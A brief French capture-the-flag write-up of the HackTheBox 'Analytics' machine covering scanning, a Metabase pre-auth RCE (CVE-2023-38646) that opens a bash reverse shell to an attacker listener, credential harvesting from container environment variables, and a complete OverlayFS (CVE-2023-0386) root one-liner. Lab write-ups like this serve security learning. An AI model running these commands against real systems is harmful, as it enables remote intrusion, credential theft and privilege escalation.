HackTheBox CVE Metabase Container Escape OverlayFS
HTB - Analytics
Exploitation Metabase pré-auth RCE via CVE-2023-38646, escalade via overlayfs dans un conteneur.
2024-02-01 Easy HackTheBox
Reconnaissance
ping 10.10.11.233
nmap -p- --open -v -sV 10.10.11.233
Ports ouverts :
- 22/tcp — SSH OpenSSH 8.9p1 Ubuntu
- 80/tcp — HTTP nginx 1.18.0
# /etc/hosts
10.10.11.233 analytical.htb
10.10.11.233 data.analytical.htb
Exploitation — CVE-2023-38646
Metabase pré-authentification RCE. Récupération du setup token :
http://data.analytical.htb/api/session/properties
→ setup-token: "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"
nc -nlvp 4444
python3 main.py -u http://data.analytical.htb \
-t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f \
-c "bash -i >& /dev/tcp/LHOST/4444 0>&1"
Post-exploitation
Extraction des credentials depuis les variables d’environnement du conteneur :
cat /proc/self/environ
metalytics:An4lytics_ds20223#
ssh metalytics@analytical.htb
cat user.txt
Privilege Escalation — Container Escape
uname -a
# Linux analytics 6.2.0-25-generic
Exploitation OverlayFS (CVE-2023-0386) :
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; \
setcap cap_setuid+eip l/python3; \
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && \
touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
cat /root/root.txt